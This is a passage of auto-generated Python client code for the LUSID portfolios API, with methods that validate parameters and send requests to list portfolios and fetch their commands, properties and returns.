if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_commands`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_commands`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_commands`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 5000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `get_portfolio_commands`, must be a value less than or equal to `5000`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `get_portfolio_commands`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'from_as_at' in local_var_params and local_var_params['from_as_at'] is not None: # noqa: E501
query_params.append(('fromAsAt', local_var_params['from_as_at'])) # noqa: E501
if 'to_as_at' in local_var_params and local_var_params['to_as_at'] is not None: # noqa: E501
query_params.append(('toAsAt', local_var_params['to_as_at'])) # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfProcessedCommand",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/commands', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_portfolio_properties(self, scope, code, **kwargs): # noqa: E501
"""GetPortfolioProperties: Get portfolio properties # noqa: E501
List all the properties of a particular portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_properties(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param effective_at: The effective datetime or cut label at which to list the portfolio's properties. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the portfolio's properties. Defaults to returning the latest version of each property if not specified.
:type as_at: datetime
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: PortfolioProperties
"""
kwargs['_return_http_data_only'] = True
return self.get_portfolio_properties_with_http_info(scope, code, **kwargs) # noqa: E501
def get_portfolio_properties_with_http_info(self, scope, code, **kwargs): # noqa: E501
"""GetPortfolioProperties: Get portfolio properties # noqa: E501
List all the properties of a particular portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_properties_with_http_info(scope, code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param effective_at: The effective datetime or cut label at which to list the portfolio's properties. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the portfolio's properties. Defaults to returning the latest version of each property if not specified.
:type as_at: datetime
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(PortfolioProperties, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'effective_at',
'as_at'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_properties" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "PortfolioProperties",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/properties', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_portfolio_returns(self, scope, code, return_scope, return_code, **kwargs): # noqa: E501
"""[EARLY ACCESS] GetPortfolioReturns: Get Returns # noqa: E501
Get Returns which are on the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_returns(scope, code, return_scope, return_code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to get the Returns.
:type from_effective_at: str
:param to_effective_at: The end date from which to get the Returns.
:type to_effective_at: str
:param period: Show the Returns on a Daily or Monthly period. Defaults to Daily.
:type period: str
:param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
:type as_at: datetime
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfPerformanceReturn
"""
kwargs['_return_http_data_only'] = True
return self.get_portfolio_returns_with_http_info(scope, code, return_scope, return_code, **kwargs) # noqa: E501
def get_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, **kwargs): # noqa: E501
"""[EARLY ACCESS] GetPortfolioReturns: Get Returns # noqa: E501
Get Returns which are on the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_returns_with_http_info(scope, code, return_scope, return_code, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to get the Returns.
:type from_effective_at: str
:param to_effective_at: The end date from which to get the Returns.
:type to_effective_at: str
:param period: Show the Returns on a Daily or Monthly period. Defaults to Daily.
:type period: str
:param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
:type as_at: datetime
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfPerformanceReturn, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'return_scope',
'return_code',
'from_effective_at',
'to_effective_at',
'period',
'as_at'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_returns" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
if 'return_scope' in local_var_params:
path_params['returnScope'] = local_var_params['return_scope'] # noqa: E501
if 'return_code' in local_var_params:
path_params['returnCode'] = local_var_params['return_code'] # noqa: E501
query_params = []
if 'from_effective_at' in local_var_params and local_var_params['from_effective_at'] is not None: # noqa: E501
query_params.append(('fromEffectiveAt', local_var_params['from_effective_at'])) # noqa: E501
if 'to_effective_at' in local_var_params and local_var_params['to_effective_at'] is not None: # noqa: E501
query_params.append(('toEffectiveAt', local_var_params['to_effective_at'])) # noqa: E501
if 'period' in local_var_params and local_var_params['period'] is not None: # noqa: E501
query_params.append(('period', local_var_params['period'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfPerformanceReturn",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_portfolios(self, **kwargs): # noqa: E501
"""ListPortfolios: List portfolios # noqa: E501
List all the portfolios matching particular criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_portfolios(async_req=True)
>>> result = thread.get()
:param effective_at: The effective datetime or cut label at which to list the portfolios. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the portfolios. Defaults to returning the latest version of each portfolio if not specified.
:type as_at: datetime
:param page: The pagination token to use to continue listing portfolios; this value is returned from the previous call. If a pagination token is provided, the filter, effectiveAt and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:type page: str
:param start: When paginating, skip this number of results.
:type start: int
:param limit: When paginating, limit the results to this number. Defaults to 65,535 if not specified.
:type limit: int
:param filter: Expression to filter the results. For example, to filter on the transaction type, specify \"type eq 'Transaction'\". For more information about filtering results, see https://support.lusid.com/knowledgebase/article/KA-01914.
:type filter: str
:param query: Expression specifying the criteria that the returned portfolios must meet. For example, to see which portfolios have holdings in instruments with a LusidInstrumentId (LUID) of 'LUID_PPA8HI6M' or a Figi of 'BBG000BLNNH6', specify \"instrument.identifiers in (('LusidInstrumentId', 'LUID_PPA8HI6M'), ('Figi', 'BBG000BLNNH6'))\".
:type query: str
:param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto each portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
:type property_keys: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfPortfolio
"""
kwargs['_return_http_data_only'] = True
return self.list_portfolios_with_http_info(**kwargs) # noqa: E501
def list_portfolios_with_http_info(self, **kwargs): # noqa: E501
"""ListPortfolios: List portfolios # noqa: E501
List all the portfolios matching particular criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_portfolios_with_http_info(async_req=True)
>>> result = thread.get()
:param effective_at: The effective datetime or cut label at which to list the portfolios. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the portfolios. Defaults to returning the latest version of each portfolio if not specified.
:type as_at: datetime
:param page: The pagination token to use to continue listing portfolios; this value is returned from the previous call. If a pagination token is provided, the filter, effectiveAt and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:type page: str
:param start: When paginating, skip this number of results.
:type start: int
:param limit: When paginating, limit the results to this number. Defaults to 65,535 if not specified.
:type limit: int
:param filter: Expression to filter the results. For example, to filter on the transaction type, specify \"type eq 'Transaction'\". For more information about filtering results, see https://support.lusid.com/knowledgebase/article/KA-01914.
:type filter: str
:param query: Expression specifying the criteria that the returned portfolios must meet. For example, to see which portfolios have holdings in instruments with a LusidInstrumentId (LUID) of 'LUID_PPA8HI6M' or a Figi of 'BBG000BLNNH6', specify \"instrument.identifiers in (('LusidInstrumentId', 'LUID_PPA8HI6M'), ('Figi', 'BBG000BLNNH6'))\".
:type query: str
:param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto each portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
:type property_keys: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfPortfolio, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'effective_at',
'as_at',
'page',
'start',
'limit',
'filter',
'query',
'property_keys'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_portfolios" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 5000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios`, must be a value less than or equal to `5000`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'start' in local_var_params and local_var_params['start'] is not None: # noqa: E501
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None: # noqa: E501
query_params.append(('propertyKeys', local_var_params['property_keys'])) # noqa: E501
collection_formats['propertyKeys'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfPortfolio",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_portfolios_for_scope(self, scope, **kwargs): # noqa: E501
"""ListPortfoliosForScope: List portfolios for scope # noqa: E501
List all the portfolios in a particular scope. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_portfolios_for_scope(scope, async_req=True)
>>> result = thread.get()
:param scope: The scope whose portfolios to list. (required)
:type scope: str
:param effective_at: The effective datetime or cut label at which to list the portfolios. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the portfolios. Defaults to returning the latest version of each portfolio if not specified.
:type as_at: datetime
:param page: The pagination token to use to continue listing portfolios. This value is returned from the previous call. If a pagination token is provided, the filter, effectiveAt and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:type page: str
:param start: When paginating, skip this number of results.
:type start: int
:param limit: When paginating, limit the results to this number. Defaults to 65,535 if not specified.
:type limit: int
:param filter: Expression to filter the results. For example, to return only transactions with a transaction type of 'Buy', specify \"type eq 'Buy'\". For more information about filtering results, see https://support.lusid.com/knowledgebase/article/KA-01914.
:type filter: str
:param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto each portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
:type property_keys: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfPortfolio
"""
kwargs['_return_http_data_only'] = True
return self.list_portfolios_for_scope_with_http_info(scope, **kwargs) # noqa: E501
def list_portfolios_for_scope_with_http_info(self, scope, **kwargs): # noqa: E501
"""ListPortfoliosForScope: List portfolios for scope # noqa: E501
List all the portfolios in a particular scope. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_portfolios_for_scope_with_http_info(scope, async_req=True)
>>> result = thread.get()
:param scope: The scope whose portfolios to list. (required)
:type scope: str
:param effective_at: The effective datetime or cut label at which to list the portfolios. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param as_at: The asAt datetime at which to list the portfolios. Defaults to returning the latest version of each portfolio if not specified.
:type as_at: datetime
:param page: The pagination token to use to continue listing portfolios. This value is returned from the previous call. If a pagination token is provided, the filter, effectiveAt and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
:type page: str
:param start: When paginating, skip this number of results.
:type start: int
:param limit: When paginating, limit the results to this number. Defaults to 65,535 if not specified.
:type limit: int
:param filter: Expression to filter the results. For example, to return only transactions with a transaction type of 'Buy', specify \"type eq 'Buy'\". For more information about filtering results, see https://support.lusid.com/knowledgebase/article/KA-01914.
:type filter: str
:param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto each portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
:type property_keys: list[str]
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfPortfolio, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'effective_at',
'as_at',
'page',
'start',
'limit',
'filter',
'property_keys'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_portfolios_for_scope" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `list_portfolios_for_scope`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `list_portfolios_for_scope`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `list_portfolios_for_scope`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 5000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios_for_scope`, must be a value less than or equal to `5000`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios_for_scope`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'as_at' in local_var_params and local_var_params['as_at'] is not None: # noqa: E501
query_params.append(('asAt', local_var_params['as_at'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'start' in local_var_params and local_var_params['start'] is not None: # noqa: E501
query_params.append(('start', local_var_params['start'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None: # noqa: E501
query_params.append(('propertyKeys', local_var_params['property_keys'])) # noqa: E501
collection_formats['propertyKeys'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfPortfolio",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def update_portfolio(self, scope, code, update_portfolio_request, **kwargs): # noqa: E501
"""UpdatePortfolio: Update portfolio # noqa: E501
Update the definition of a particular portfolio. Note that not all elements of a portfolio definition are modifiable due to the potential implications for data already stored. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_portfolio(scope, code, update_portfolio_request, async_req=True)
>>> result = thread.get()
:param scope: The scope of the portfolio. (required)
:type scope: str
:param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
:type code: str
:param update_portfolio_request: The updated portfolio definition. (required)
:type update_portfolio_request: UpdatePortfolioRequest
:param effective_at: The effective datetime or cut label at which to update the definition. Defaults to the current LUSID system datetime if not specified.
:type effective_at: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Portfolio
"""
kwargs['_return_http_data_only'] = True
return self.update_portfolio_with_http_info(scope, code, update_portfolio_request, **kwargs) # noqa: E501
def update_portfolio_with_http_info(self, scope, code, update_portfolio_request, **kwargs): # noqa: E501
